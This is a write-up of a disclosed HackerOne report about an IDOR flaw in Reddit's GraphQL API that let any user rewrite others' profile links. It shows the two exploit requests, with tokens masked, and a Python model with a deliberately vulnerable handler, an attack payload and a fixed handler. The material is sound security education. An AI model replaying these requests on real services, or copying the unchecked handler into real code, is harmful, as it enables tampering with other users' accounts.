IDOR (Insecure Direct Object Reference) is a broad but potentially critical class of vulnerability. It occurs when an application exposes a reference to an internal object (a database ID, a filename, a record key) and then acts on a client-supplied reference without checking that the requesting user is actually authorized to access that object. The problem is missing authorization, not malformed input: the value is usually perfectly well-formed, it just belongs to someone else. An attacker can use this to read or modify resources belonging to other users, or to perform actions on their behalf.
In this write-up I'll explain a disclosed HackerOne report submitted by the user criptex.
The report can be found here
Reddit users can add custom links or social media profile links to their Reddit profile; these links redirect visitors to external sites.
The custom links on a profile were changed with the following request, which turned out to be vulnerable:
POST / HTTP/2
Host: gql.reddit.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20000101 Firefox/101.0
Accept: */*
Accept-Language: es-AR,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 173
X-Reddit-Loid: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
X-Reddit-Session: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
X-Reddit-Compression: 1
Origin: https://www.reddit.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: Bearer * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Referer: https://www.reddit.com/
Te: trailers

{"id":"c558e604581f","variables":{"input":{"socialLinks":[{"outboundUrl":"https://www.hackerone.com","title":"hacker","type":"CUSTOM","id":"* * * * * * * * * * * * * * * * * * * * * * * * * * * * * *"}]}}}
By changing the id value inside socialLinks in this request, he was able to modify the profile links of any Reddit user: the server acted on whatever link id the client supplied without checking that it belonged to the authenticated account. He used the following request to obtain the custom link IDs on other users' profiles (the query takes only a username, so the IDs are readily discoverable):
POST / HTTP/2
Host: gql.reddit.com
Content-Length: 62
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
X-Reddit-Loid: * * ** * * * * * * * * * * ** * * * * * * * * * * * * * * * * *
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/531.36
X-Reddit-Compression: 1
X-Reddit-Session: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://www.reddit.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.reddit.com/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en-US;q=0.8,en;q=0.7,bs;q=0.6,ja;q=0.5

{"id":"11a239b07f86","variables":{"username":"*********"}}
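To make the bug and its fix concrete, here is an added example that is not Reddit's code and not part of the report: a minimal model of an "update social links" handler written twice, once with the flaw described above (it trusts the client-supplied link id) and once with the ownership check that was missing. The in-memory LINKS store, the usernames alice and bob, and the link ids are constructed for illustration; the payload mirrors the shape of the mutation variables shown in the first request.

```python
# Added example (not Reddit's code, not from the report): a minimal model of an
# "update social links" mutation, written twice, once with the IDOR the report
# describes and once with the missing ownership check. The in-memory LINKS
# store, the usernames and link ids are constructed for illustration.
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class SocialLink:
    id: str
    owner: str          # username that owns this link
    title: str
    outbound_url: str
    type: str = "CUSTOM"


class Forbidden(Exception):
    """Raised when the actor may not modify the referenced object."""


# Stand-in for the database table of profile links (constructed data).
LINKS: Dict[str, SocialLink] = {}


def seed() -> None:
    LINKS.clear()
    LINKS["lnk-alice-1"] = SocialLink("lnk-alice-1", "alice", "my blog", "https://alice.example")
    LINKS["lnk-bob-1"] = SocialLink("lnk-bob-1", "bob", "portfolio", "https://bob.example")


def update_social_links_vulnerable(actor: str, variables: dict) -> List[SocialLink]:
    """Mirrors the flaw: the handler resolves whatever link id the client sends
    and writes to it. `actor` (the authenticated user) is never consulted."""
    updated = []
    for item in variables["input"]["socialLinks"]:
        link = LINKS[item["id"]]             # direct object reference, unchecked
        link.title = item["title"]
        link.outbound_url = item["outboundUrl"]
        updated.append(link)
    return updated


def update_social_links_fixed(actor: str, variables: dict) -> List[SocialLink]:
    """Hardened form: every referenced link must belong to the actor. The check
    runs over the whole batch before any write, so a request mixing the actor's
    own ids with a victim's id is rejected without partial updates."""
    resolved = []
    for item in variables["input"]["socialLinks"]:
        link = LINKS.get(item["id"])
        # Same error for unknown and foreign ids, so the response cannot be
        # used to confirm which ids exist.
        if link is None or link.owner != actor:
            raise Forbidden("social link not found")
        resolved.append((link, item))
    for link, item in resolved:
        link.title = item["title"]
        link.outbound_url = item["outboundUrl"]
    return [link for link, _ in resolved]


# Variables shaped like the report's mutation, with the link id swapped for a
# victim's id (alice is the attacker, bob the victim; constructed values).
ATTACK_VARIABLES = {
    "input": {
        "socialLinks": [
            {"outboundUrl": "https://www.hackerone.com", "title": "hacker",
             "type": "CUSTOM", "id": "lnk-bob-1"}
        ]
    }
}


def demo() -> Tuple[str, bool, str]:
    """Returns (bob's URL after the vulnerable handler, whether the fixed
    handler refused the request, bob's URL after the fixed handler)."""
    seed()
    update_social_links_vulnerable("alice", ATTACK_VARIABLES)
    after_vulnerable = LINKS["lnk-bob-1"].outbound_url

    seed()
    refused = False
    try:
        update_social_links_fixed("alice", ATTACK_VARIABLES)
    except Forbidden:
        refused = True
    after_fixed = LINKS["lnk-bob-1"].outbound_url
    return after_vulnerable, refused, after_fixed


if __name__ == "__main__":
    print(demo())
```

Running demo() shows alice rewriting bob's link through the vulnerable handler and being refused by the fixed one. Note that making link ids unpredictable would not have been a fix here: the second request above hands out a user's link ids given only their username, so the only real control is checking, server-side, that the object referenced by the request belongs to the authenticated user.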
Since an attacker could plant arbitrary links on any user's profile, with obvious reputational impact for Reddit and its users, criptex was rewarded a well-deserved $5,000 bounty.